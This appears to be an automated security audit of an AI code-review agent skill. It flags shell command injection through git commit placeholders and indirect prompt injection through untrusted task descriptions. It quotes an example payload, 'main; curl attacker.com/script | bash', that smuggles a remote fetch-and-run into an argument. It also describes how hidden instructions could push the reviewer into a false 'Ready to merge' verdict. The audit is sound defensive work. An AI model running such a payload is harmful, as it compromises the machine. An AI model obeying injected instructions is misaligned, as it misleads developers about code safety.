requesting-code-review
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): Vulnerable to shell command injection through git commit identifiers.
  - Evidence: The file `code-reviewer.md` directly interpolates `{BASE_SHA}` and `{HEAD_SHA}` into a shell command block: `git diff --stat {BASE_SHA}..{HEAD_SHA}`.
  - Risk: If an attacker can control these identifiers (e.g., providing a value like `main; curl attacker.com/script | bash`), they can execute arbitrary commands in the agent's environment.
- [PROMPT_INJECTION] (HIGH): Vulnerable to indirect prompt injection via external implementation descriptions and project plans.
  - Ingestion points: `code-reviewer.md` accepts untrusted data through the `{WHAT_WAS_IMPLEMENTED}` and `{PLAN_OR_REQUIREMENTS}` placeholders.
  - Boundary markers: There are no delimiters or explicit instructions to ignore embedded commands within these inputs.
  - Capability inventory: The subagent performs file system operations (`git diff`) and generates a 'Ready to merge' verdict that influences development workflows.
  - Sanitization: No sanitization or escaping is performed on the descriptive inputs.
  - Risk: Malicious instructions hidden in a task description or requirements document could trick the reviewer into overlooking security flaws or providing a false 'Ready to merge' assessment.
Recommendations
- AI detected serious security threats
Audit Metadata